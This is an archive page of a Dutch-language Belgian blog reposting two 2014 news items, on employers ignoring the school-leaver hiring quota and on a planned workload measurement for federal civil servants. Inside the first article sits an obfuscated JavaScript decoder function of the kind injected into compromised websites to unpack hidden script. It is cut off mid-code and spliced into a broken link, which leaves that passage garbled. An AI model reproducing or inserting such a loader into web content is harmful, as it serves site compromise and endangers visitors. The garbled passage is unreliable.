Archief november, 2014

Reacties uitgeschakeld voor Overheid zet jongeren in de kou

Overheid zet jongeren in de kou

Door | 20 november 2014 | Nieuws

Bron: De Morgen, DOMINIQUE SOENENS
20-11-14, 06.47u

De wettelijke verplichting om minstens 3 procent schoolverlaters aan te werven, wordt door steeds minder bedrijven en overheidsinstellingen nageleefd. Die laatsten blijven het meest in gebreke: bijna de helft voldoet niet aan de norm.

Wie meer dan 50 werknemers in dienst heeft, moet sinds 1999 minstens 3 procent schoolverlaters aanwerven. De maatregel werd door Laurette Onkelinx (PS) in het leven geroepen om de jeugdwerkloosheid aan te pakken en geldt voor jongeren onder de 26 jaar, met of zonder scholing.

De Nationale Arbeidsraad (NAR) stelt nu in een rapport vast dat steeds minder bedrijven en vooral overheidsinstellingen zich aan die verplichting houden. “Op basis van de RSZ-cijfers is een duidelijke daling te zien in de periode 2004-2013. Zeker in de laatste jaren is er een grote terugval in het aantal bedrijven dat de maatregel volgt: van 87 procent in 2008 tot 81 procent in 2013.”

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndand/overheid-zet-jongeren-in-de-kou-a2126424/” title=”Lees hier verder”>Lees hier verder

Reacties uitgeschakeld voor Werklastmeting ambtenaren van start in januari 2016

Werklastmeting ambtenaren van start in januari 2016

Door | 17 november 2014 | Nieuws

Werklastmeting ambtenaren van start in januari 2016
17/11/2014 om 16:13 door aro | Bron: BELGA

Mail
Print

Bron: De Standaard, 17/11/2014
Tegen januari 2016 moet de werklastmeting voor de ambtenaren operationeel zijn. Dat heeft minister Steven Vandeput (N-VA) maandagmiddag gezegd in de Kamer bij de bespreking van zijn beleidsverklaring.
Vandeput kennen we intussen vooral als onze nieuwe minister van Defensie, maar daarnaast is hij ook bevoegd voor Ambtenarenzaken. Tijdens zijn beleidsverklaring, die hij maandag voorstelt in de Kamer, kwam dus ook deze bevoegdheid aan bod.

Van de werklastmeting was al sprake in het regeerakkoord, maar een datum was er tot vandaag nog niet. Bedoeling van zo’n meting is dat wordt bekeken in welke afdelingen te veel, net genoeg of te weinig uren worden geklopt. Op basis daarvan kan dan worden geschoven met de ambtenaren. De meting zal dus van start gaan vanaf januari 2016, zo kondigde Vandeput aan. Ze zal worden uitgewerkt door de FOD Personeel en Organisatie en concreet worden uitgevoerd door het management van de betrokken FOD of overheidsdienst.

Daarnaast had de minister het ook kort over de besparingen, waar ook de ambtenaren aan moeten bijdragen. ‘In het regeerakoord en de begroting wordt gesproken over lineaire besparingen, maar bij de implementatie ervan moet wel bekeken worden waar er nog ruimte is en waar er knelpunten zijn’, klonk het. Hetzelfde geldt volgens Vandeput voor de niet-vervanging van personeel dat op pensioen vertrekt. ‘Via onderhandelingen kan er gedifferentieerd worden, en ook synergieën en samenwerkingsverbanden zijn mogelijk.’